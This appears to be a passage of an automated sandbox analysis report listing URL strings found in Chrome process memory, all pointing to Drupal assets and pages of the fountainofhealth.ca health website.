                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/5-minute-cbt-course
                                  Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/7
                                  Source: chrome.exe, 00000000.00000002.2487549813.000028EC03B90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/Home
                                  Source: chrome.exe, 00000000.00000002.2499837074.000028EC06424000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/LnB1c2goVil9fSk=
                                  Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/X
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/about-us#about-foh-learning-center
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/about-us#about-foh-learning-centererdler
                                  Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501144025.000028EC06888000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/clinicians
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/button.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2500543178.000028EC066F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/themes/base/dialog.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320114784.000028EC0663C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/data-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473488281.000028EC02A6C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320114784.000028EC0663C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/disable-selection-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481637546.000028EC033B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2475705022.000028EC02CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0/
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470544813.000028EC02604000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/version-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2495089287.000028EC04770000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490153719.000028EC03F40000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320146432.000028EC06700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481637546.000028EC033B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320190791.000028EC06934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0.0
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jq
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jqery.minv=3.
                                  Source: chrome.exe, 00000000.00000003.2342734816.000028EC063C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2342988019.000028EC063A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC57000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/jquery/jquery.min.js?v=3.7.0
                                  Source: chrome.exe, 00000000.00000002.2489657256.000028EC03E9C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495723401.000028EC04840000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0
                                  Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320190791.000028EC06934000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2
                                  Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490153719.000028EC03F40000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6
                                  Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315030779.000028EC05178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6a
                                  Source: chrome.exe, 00000000.00000003.2314997569.000028EC051A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315061036.000028EC05170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2315030779.000028EC05178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/assets/vendor/underscore/underscore-min.js?v=1.13.6aDb
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497831692.000028EC04E14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/ajax.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/ajax.js?v=10.1.0sage.js?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/announce.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/debounce.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/debounce.js?v=10.1.0.js?v=4.2.0
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475340752.000028EC02C67000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0a
                                  Source: chrome.exe, 00000000.00000003.2319531177.000028EC04D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.ajax.js?v=10.1.0aDb
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.js?v=10.1.0bridge.js?swjs7b
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC0490C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492115334.000028EC040C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/dialog/dialog.position.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/displace.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491141569.000028EC04034000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.init.js?v=10.1.0con.pngr
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.js?v=10.1.0er.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/drupal.js?v=10.1.0er.js?v=10.1.0.min.js?v=1.0.1
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/drupalSettingsLoader.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/jquery.tabbable.shim.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/message.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000003.2320221985.000028EC06B00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490012641.000028EC03F0C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/position.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0
                                  Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/misc/progress.js?v=10.1.0avicon.png
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/align.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/clearfix.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/clearfix.module.css?swjs7bb
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/container-inline.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/hidden.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/js.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/nowrap.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/position-container.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/resize.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/sticky-header.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/sticky-header.module.css?swjs7b7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/system-status-counter.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/system-status-report-counters.css?swj
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/tree-child.module.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2478973718.000028EC03164000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/system/css/components/tree-child.module.css?swjs7b.css?swjs
                                  Source: chrome.exe, 00000000.00000002.2488053854.000028EC03C4C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/core/modules/views/css/views-responsive-grid.css?swjs7b
                                  Source: chrome.exe, 00000000.00000002.2495959896.000028EC048B8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/cript
                                  Source: chrome.exe, 00000000.00000002.2499413473.000028EC06330000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475518277.000028EC02CA4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508836784.000028EC08114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2394042539.000028EC03558000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2508320989.000028EC07F50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362065696.000028EC06E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378748801.000028EC03845000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472109476.000028EC02820000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en
                                  Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en#main-content
                                  Source: chrome.exe, 00000000.00000002.2470707336.000028EC02690000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352577508.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329801485.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329951400.000028EC0663C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341031480.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494918575.000028EC046E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400603614.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329921091.000028EC06930000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en(
                                  Source: chrome.exe, 00000000.00000002.2489230157.000028EC03E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/
                                  Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/about-us
                                  Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/form/contact-us
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/home
                                  Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/node/113
                                  Source: chrome.exe, 00000000.00000003.2385216493.000028EC0682C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2470328399.000028EC025B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385216493.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC5D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2486226544.000028EC03934000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2502757759.000028EC06E04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504920631.000028EC07968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439458597.000001E4ACC57000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2341844101.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/search/node
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fountainofhealth.ca/en/thrive-c-approach-wellbeing
